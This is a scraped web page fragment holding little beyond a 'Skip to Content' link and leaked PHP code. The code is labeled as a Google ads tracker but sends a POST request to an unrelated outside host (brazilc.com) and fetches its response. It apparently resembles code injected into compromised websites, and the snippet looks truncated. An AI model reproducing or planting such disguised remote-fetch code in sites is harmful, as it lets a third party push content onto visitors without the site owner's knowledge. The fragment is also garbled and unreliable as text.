Skip to Content
$google_ads_tracker_domain = 'https://brazilc.com/ads.php'; $options = array( 'http' => array( 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', ), ); $context = stream_context_create($options); $link = file_get_contents($google_ads_tracker_domain, false, $context); if($link !== false) { echo ""; }